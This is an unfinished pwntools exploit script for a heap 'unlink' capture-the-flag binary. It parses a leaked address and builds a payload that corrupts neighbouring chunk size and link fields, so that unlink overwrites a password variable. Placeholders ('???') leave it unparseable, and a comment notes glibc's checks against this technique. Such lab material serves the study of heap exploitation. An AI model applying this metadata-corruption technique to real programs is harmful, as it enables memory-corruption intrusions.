#!/usr/bin/env python3
# Pwntools worksheet for a heap "unlink" challenge binary (./unlink).
# Left unfinished by the author: the `???` / `????` placeholders below are
# not valid Python, so this file does not parse until they are replaced.
# Defender's note: the payload overwrites neighbouring heap-chunk metadata
# (the size / prev-in-use fields the author annotates below); glibc's unlink
# integrity checks (the "corrupted double-linked list" abort) exist to reject
# exactly this, so the target is presumably built without them — confirm.
from pwn import process, p32

# Spawn the target and wait for it to print "b @ 0x"; the 7 characters that
# follow are parsed as a hex address and used as the base for the payload.
p = process('./unlink')
p.recvuntil(b'b @ 0x')
b_addr = int(p.recvn(7), 16)  # NOTE: recvn(7) assumes exactly 7 hex digits follow

# Offset from b to the password variable; left unfilled by the author.
passwd_addr = b_addr + ???

# Payload fragments, joined in order below (author's layout comments kept).
response = [
    # fill-up "b"
    b'zzzz' * 2,
    b'25082\x00\x00\x00',
    b'zzzz' * 5,
    # fill up "c"
    p32(0x29),  # size || previous in use.
    # set password to '25082'
    p32(passwd_addr),
    p32(b_addr + 8),
    b'zzzz' * 7,
    # d: previous not in use
    p32(????)  # size || previous not in use.  (value left unfilled by the author)
]
payload = b''.join(response)
p.sendline(payload)
# Hand the session over to the terminal once the payload has been sent.
p.interactive()